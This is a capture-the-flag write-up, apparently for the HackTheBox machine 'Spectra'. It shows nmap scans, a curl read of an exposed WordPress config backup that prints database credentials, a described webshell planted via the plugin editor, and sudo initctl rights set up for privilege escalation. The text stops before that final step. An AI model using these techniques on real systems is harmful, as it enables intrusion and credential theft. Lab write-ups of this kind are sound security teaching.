$ nmap -p- --min-rate 3000 10.129.244.152
Starting Nmap 7.93 ( https://nmap.org ) at 2023-09-30 23:05 +08
Nmap scan report for 10.129.244.152
Host is up (0.0055s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3306/tcp open mysql
HTTP and MySQL are open. I did a detailed scan as well:
$ nmap -p 80,3306 -sC -sV --min-rate 3000 10.129.244.152
Starting Nmap 7.93 ( https://nmap.org ) at 2023-09-30 23:07 +08
Nmap scan report for 10.129.244.152
Host is up (0.010s latency).
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.17.4
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.17.4
3306/tcp open mysql MySQL (unauthorized)
We can start Burpsuite and begin enumerating the web service.
Web Enum -> WP Creds
The website just showed two links, and mentions Jira, which is a ticket tracker software.
When the page HTML is viewed, we can see where the link takes us.
After adding spectra.htb to the /etc/hosts file, we can take a look at what software the websites are running. The first website brought me to a Wordpress site:
We can use wpscan to enumerate the website for us. This was an older machine, so Wordpress Core will definitely be outdated. There were quite a few plugins found to be outdated, but I didn't manage to exploit them. wpscan did find one user though:
Anyways, moving to the testing/index.php site, it just shows us an error:
Loading the /testing directory shows us a listing:
What's interesting was the .save file, which could actually be read with curl to find credentials:
$ curl http://spectra.htb/testing/wp-config.php.save
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the
* installation. You don't have to use the web site, you can
* copy this file to "wp-config.php" and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://wordpress.org/support/article/editing-wp-config-php/
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'dev' );
/** MySQL database username */
define( 'DB_USER', 'devtest' );
/** MySQL database password */
define( 'DB_PASSWORD', 'devteam01' );
Using this password, we can login as administrator to the Wordpress site. Using this, I tried to get a reverse shell by manipulating the 404.php within the theme being used.
However, this error popped up:
We'll have to find a different method to get a shell.
Akismet Plugin -> RCE
There are 2 plugins installed on the site:
Instead of finding a public exploit, we can actually edit the plugin directly on Wordpress. Using the Plugin Editor, I replaced the PHP code with a webshell. In this case, I replaced the code for akismet.php, and it can be triggered using curl:
I didn't know a lot about how ChromeOS functioned, but tools like pspy64 didn't work. Within the /opt directory, there were some interesting files:
nginx@spectra /opt $ ls -la
total 44
drwxr-xr-x 10 root root 4096 Feb 3 2021 .
drwxr-xr-x 22 root root 4096 Feb 2 2021 ..
drwxr-xr-x 2 root root 4096 Jun 28 2020 VirtualBox
-rw-r--r-- 1 root root 978 Feb 3 2021 autologin.conf.orig
drwxr-xr-x 2 root root 4096 Jan 15 2021 broadcom
drwxr-xr-x 2 root root 4096 Jan 15 2021 displaylink
drwxr-xr-x 2 root root 4096 Jan 15 2021 eeti
drwxr-xr-x 5 root root 4096 Jan 15 2021 google
drwxr-xr-x 6 root root 4096 Feb 2 2021 neverware
drwxr-xr-x 5 root root 4096 Jan 15 2021 tpm1
drwxr-xr-x 5 root root 4096 Jan 15 2021 tpm2
The autologin.conf file contained some interesting stuff:
# Copyright 2016 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
description "Automatic login at boot"
author "chromium-os-dev@chromium.org"
# After boot-complete starts, the login prompt is visible and is accepting
# input.
start on started boot-complete
script
passwd=
# Read password from file. The file may optionally end with a newline.
for dir in /mnt/stateful_partition/etc/autologin /etc/autologin; do
if [ -e "${dir}/passwd" ]; then
passwd="$(cat "${dir}/passwd")"
break
fi
done
if [ -z "${passwd}" ]; then
exit 0
fi
# Inject keys into the login prompt.
#
# For this to work, you must have already created an account on the device.
# Otherwise, no login prompt appears at boot and the injected keys do the
# wrong thing.
/usr/local/sbin/inject-keys.py -s "${passwd}" -k enter
From what I gathered, there's a password in the /etc/autologin directory:
katie@spectra ~ $ sudo -l
User katie may run the following commands on spectra:
(ALL) SETENV: NOPASSWD: /sbin/initctl
This binary allows us to initialise daemons:
katie@spectra ~ $ /sbin/initctl help
Job commands:
start Start job.
stop Stop job.
restart Restart job.
reload Send HUP signal to job.
status Query status of job.
list List known jobs.
Event commands:
emit Emit an event.
Other commands:
reload-configuration Reload the configuration of the init daemon.
version Request the version of the init daemon.
log-priority Change the minimum priority of log messages from the init
daemon
show-config Show emits, start on and stop on details for job
configurations.
help display list of commands
For more information on a command, try `initctl COMMAND --help'
Also, I checked which files were owned by katie and the developers group:
